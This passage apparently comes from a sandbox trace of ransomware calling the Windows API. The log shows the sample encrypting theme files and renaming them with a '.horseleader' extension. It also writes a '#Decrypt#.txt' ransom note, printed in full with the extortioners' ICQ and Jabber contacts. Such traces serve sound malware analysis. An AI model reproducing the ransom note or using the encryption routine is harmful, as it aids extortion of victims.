hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.246] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.246] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.246] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb1cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.247] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.248] CloseHandle (hObject=0x1a4) returned 1 [0248.248] GetProcessHeap () returned 0x780000 [0248.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.248] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM.horseleader") returned 87 [0248.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm.horseleader")) returned 1 [0248.249] GetProcessHeap () returned 0x780000 [0248.249] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.249] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.INF", cAlternateFileName="")) returned 1 [0248.249] lstrcmpiW (lpString1="WATER.INF", lpString2="Windows") 
returned -1 [0248.249] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0248.249] StrStrIW (lpFirst="WATER.INF", lpSrch=".horseleader") returned 0x0 [0248.249] lstrcmpW (lpString1="WATER.INF", lpString2="#Decrypt#.txt") returned 1 [0248.250] lstrcmpW (lpString1="WATER.INF", lpString2="_uninstalling_.png") returned 1 [0248.250] lstrlenW (lpString=".testttjffg") returned 11 [0248.250] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF", lpSrch=".testttjffg") returned 0x0 [0248.250] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.250] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0248.251] StrStrW (lpFirst="WATER.INF", lpSrch=".txt") returned 0x0 [0248.251] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=417) returned 1 [0248.252] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a1, lpOverlapped=0x0) returned 1 [0248.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe5f, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a1, lpOverlapped=0x0) returned 1 [0248.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.253] CloseHandle (hObject=0x1a4) returned 1 [0248.254] GetProcessHeap () returned 0x780000 [0248.254] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.254] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF.horseleader") returned 87 [0248.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf.horseleader")) returned 1 [0248.255] GetProcessHeap () returned 0x780000 [0248.255] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.INF", cAlternateFileName="")) returned 0 [0248.255] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.255] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\#Decrypt#.txt") returned 79 [0248.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.256] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.256] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.257] lstrlenA (lpString="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") returned 1368 [0248.257] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.257] CloseHandle (hObject=0x158) returned 1 [0248.257] GetProcessHeap () returned 0x780000 [0248.257] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.257] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0248.257] lstrcmpiW (lpString1="WATERMAR", lpString2="Windows") returned -1 [0248.257] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned 68 [0248.257] lstrcmpW (lpString1="WATERMAR", lpString2=".") returned 1 [0248.257] lstrcmpW (lpString1="WATERMAR", lpString2="..") returned 1 [0248.257] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.258] GetProcessHeap () returned 0x780000 [0248.258] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.258] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*") returned 70 [0248.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.258] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.258] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\.") returned 70 [0248.258] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.258] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.258] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.258] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\..") returned 71 [0248.258] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0248.258] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.258] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x623, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.259] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.259] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0248.259] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.259] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.259] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.259] lstrlenW (lpString=".testttjffg") returned 11 [0248.259] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.261] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 80 [0248.261] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.261] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1571) returned 1 [0248.261] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x623, lpOverlapped=0x0) returned 1 [0248.263] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x623, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x623, lpOverlapped=0x0) returned 1 [0248.263] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.263] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.263] CloseHandle (hObject=0x1a4) returned 1 [0248.264] GetProcessHeap () returned 0x780000 [0248.264] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.264] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.horseleader") returned 92 [0248.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.horseleader")) returned 1 [0248.265] GetProcessHeap () returned 0x780000 [0248.265] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.265] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x75da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.265] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.265] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0248.265] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.265] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.265] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.265] lstrlenW (lpString=".testttjffg") returned 11 [0248.265] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.265] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.265] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 81 [0248.267] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.267] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=30170) returned 1 [0248.267] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.270] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.270] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x25da, lpOverlapped=0x0) returned 1 [0248.271] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffda26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x25da, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x25da, lpOverlapped=0x0) returned 1 [0248.271] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.271] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.271] CloseHandle (hObject=0x1a4) returned 1 [0248.271] GetProcessHeap () returned 0x780000 [0248.271] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.271] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.horseleader") returned 93 [0248.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.horseleader")) returned 1 [0248.275] GetProcessHeap () returned 0x780000 [0248.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.275] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
